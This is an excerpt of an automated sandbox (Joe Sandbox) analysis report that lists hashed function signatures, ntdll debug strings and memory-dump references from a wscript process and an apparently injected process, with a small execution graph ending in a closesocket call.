                                                                                                                                                                              • Opcode ID: 9ab06936f4016832785fb738919f294414c29c74ceb271a3eee9addf82a1c787
                                                                                                                                                                              • Instruction ID: 2feacfd2ee8474720c9a308709ec34bf28da19213015ff3d84b1a92fc2b465c6
                                                                                                                                                                              • Opcode Fuzzy Hash: 9ab06936f4016832785fb738919f294414c29c74ceb271a3eee9addf82a1c787
                                                                                                                                                                              • Instruction Fuzzy Hash: 2451F6B2B00216BFDB10DF98D99097EF7B9BB4A20571086B9E465D7641E334FE40CBA0
                                                                                                                                                                              Strings
                                                                                                                                                                              • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 049646FC
                                                                                                                                                                              • CLIENT(ntdll): Processing section info %ws..., xrefs: 04964787
                                                                                                                                                                              • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 04964742
                                                                                                                                                                              • Execute=1, xrefs: 04964713
                                                                                                                                                                              • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 04964725
                                                                                                                                                                              • ExecuteOptions, xrefs: 049646A0
                                                                                                                                                                              • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 04964655
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.4500264920.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.4500264920.00000000049E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.4500264920.00000000049ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.4500264920.0000000004A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_48c0000_wscript.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                                                                              • API String ID: 0-484625025
                                                                                                                                                                              • Opcode ID: 2561beea877eeff60428e4cee9efd47b95990fbe3481e043d2c8c62d7fbe62a4
                                                                                                                                                                              • Instruction ID: ca8c066cc478c7159b25766998042c9a99167d0f29826498a97c1b76e5acfb42
                                                                                                                                                                              • Opcode Fuzzy Hash: 2561beea877eeff60428e4cee9efd47b95990fbe3481e043d2c8c62d7fbe62a4
                                                                                                                                                                              • Instruction Fuzzy Hash: 5B5105316012297AEF10AAE4DD89BAA77ADAF84304F0405F9E506BB180EB71BE458F51
                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.4500264920.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.4500264920.00000000049E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.4500264920.00000000049ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.4500264920.0000000004A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_48c0000_wscript.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: __aulldvrm
                                                                                                                                                                              • String ID: +$-$0$0
                                                                                                                                                                              • API String ID: 1302938615-699404926
                                                                                                                                                                              • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                                                                                                              • Instruction ID: ee320e65a6e6cfd59f99a083736de34f3c332657c907f728af69e07971abe2f0
                                                                                                                                                                              • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                                                                                                              • Instruction Fuzzy Hash: 6B81E470E052499EDF248E68C8517FEBBB6EF87326F18453AD852A7693C734B840C751
                                                                                                                                                                              Strings
                                                                                                                                                                              • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 049602BD
                                                                                                                                                                              • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 049602E7
                                                                                                                                                                              • RTL: Re-Waiting, xrefs: 0496031E
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.4500264920.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.4500264920.00000000049E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.4500264920.00000000049ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.4500264920.0000000004A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_48c0000_wscript.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                                                                                              • API String ID: 0-2474120054
                                                                                                                                                                              • Opcode ID: 8c1bca2e10983b8b8b1055e6015c79897cd0d71378dbfca2460916a7a306a6dc
                                                                                                                                                                              • Instruction ID: edaa61597b747f1001a0121c28d947754a46c051b6e7ad47951d96c26bb957b4
                                                                                                                                                                              • Opcode Fuzzy Hash: 8c1bca2e10983b8b8b1055e6015c79897cd0d71378dbfca2460916a7a306a6dc
                                                                                                                                                                              • Instruction Fuzzy Hash: E9E1AF706087499FD725CF28C884B2AB7E5BF89314F140A7DE5A68B2E1E774F844CB42
                                                                                                                                                                              Strings
                                                                                                                                                                              • RTL: Re-Waiting, xrefs: 04967BAC
                                                                                                                                                                              • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 04967B7F
                                                                                                                                                                              • RTL: Resource at %p, xrefs: 04967B8E
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.4500264920.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.4500264920.00000000049E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.4500264920.00000000049ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.4500264920.0000000004A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_48c0000_wscript.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                                              • API String ID: 0-871070163
                                                                                                                                                                              • Opcode ID: 87e55aa90446a31732f54dbcc1e0746a2208ab19a213869279e13b9944eec45d
                                                                                                                                                                              • Instruction ID: e168c285c0c8b92d90983d7c15cdbc167af4e73aa7b90a8ec372a8aba6c8b858
                                                                                                                                                                              • Opcode Fuzzy Hash: 87e55aa90446a31732f54dbcc1e0746a2208ab19a213869279e13b9944eec45d
                                                                                                                                                                              • Instruction Fuzzy Hash: DE41D3317457029FD720EE25C940B6AB7E9FF88724F100A3DE95AEB684DB71F4058B91
                                                                                                                                                                              APIs
                                                                                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0496728C
                                                                                                                                                                              Strings
                                                                                                                                                                              • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 04967294
                                                                                                                                                                              • RTL: Re-Waiting, xrefs: 049672C1
                                                                                                                                                                              • RTL: Resource at %p, xrefs: 049672A3
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.4500264920.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.4500264920.00000000049E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.4500264920.00000000049ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.4500264920.0000000004A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_48c0000_wscript.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                              • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                                              • API String ID: 885266447-605551621
                                                                                                                                                                              • Opcode ID: ae4b380d98197f649a413d7622143a7b83487368914b6ee50c4878a63165aeaa
                                                                                                                                                                              • Instruction ID: 30058571b722ce26d27c3d3dcca91cd7eba588cdf7e47211d10a8bd759438a0a
                                                                                                                                                                              • Opcode Fuzzy Hash: ae4b380d98197f649a413d7622143a7b83487368914b6ee50c4878a63165aeaa
                                                                                                                                                                              • Instruction Fuzzy Hash: 4241D031700616ABE720DE65CD81F6AB7E5FB84718F100A39F956EB244DB21F842DBD1
                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.4500264920.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.4500264920.00000000049E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.4500264920.00000000049ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.4500264920.0000000004A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_48c0000_wscript.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: __aulldvrm
                                                                                                                                                                              • String ID: +$-
                                                                                                                                                                              • API String ID: 1302938615-2137968064
                                                                                                                                                                              • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                                                                                                              • Instruction ID: 455a610ec5a4374871d4422db22410b0cd4908e9376c20c0df73054a0d55cb9c
                                                                                                                                                                              • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                                                                                                              • Instruction Fuzzy Hash: 729197B0E402169BDB24DF99C8846BEB7E9FF46322F14C57AF855A72D0E730B9408760
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.4500264920.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.4500264920.00000000049E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.4500264920.00000000049ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.4500264920.0000000004A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_48c0000_wscript.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: $$@
                                                                                                                                                                              • API String ID: 0-1194432280
                                                                                                                                                                              • Opcode ID: def258a19bf9fe7ad1f9153e205a4deeb9d255fa3c909fcf38402ecbd27f7bb0
                                                                                                                                                                              • Instruction ID: 4f834abd97e870f02ae8e9d211f9a36fad1b1063ef050730f25c7902b6ba3e35
                                                                                                                                                                              • Opcode Fuzzy Hash: def258a19bf9fe7ad1f9153e205a4deeb9d255fa3c909fcf38402ecbd27f7bb0
                                                                                                                                                                              • Instruction Fuzzy Hash: F8812EB1D002699BDB31CF54CC44BEEB7B8AB48714F1045EAE919B7250E7746E85CFA0

                                                                                                                                                                              Execution Graph

                                                                                                                                                                              Execution Coverage:2.3%
                                                                                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                              Signature Coverage:0%
                                                                                                                                                                              Total number of Nodes:3
                                                                                                                                                                              Total number of Limit Nodes:0
                                                                                                                                                                              execution_graph 12630 4bfb661 12631 4bfb67b 12630->12631 12632 4bfb68a closesocket 12631->12632

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              • Executed
                                                                                                                                                                              • Not Executed
                                                                                                                                                                              control_flow_graph 9 4bfb661-4bfb698 call 4bd2ce1 call 4bfc271 closesocket
                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000D.00000002.4502014395.0000000004BB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 04BB0000, based on PE: false
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_13_2_4bb0000_tCyxXhRNgdPI.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: closesocket
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2781271927-0
                                                                                                                                                                              • Opcode ID: 9b6371fb5e43528a43d6eaaf1feeeb21ad9e5bca3a082b5d88f8e16adbd4370d
                                                                                                                                                                              • Instruction ID: 1df7e1e6affc7a4dc2dc2043bc16f83e9c35ca26b70c96423547b64e261b7cf4
                                                                                                                                                                              • Opcode Fuzzy Hash: 9b6371fb5e43528a43d6eaaf1feeeb21ad9e5bca3a082b5d88f8e16adbd4370d
                                                                                                                                                                              • Instruction Fuzzy Hash: 1AE086361001047BD614EB99DC40CE7776DEFC5350B004455FE0C67200C671BA1187F0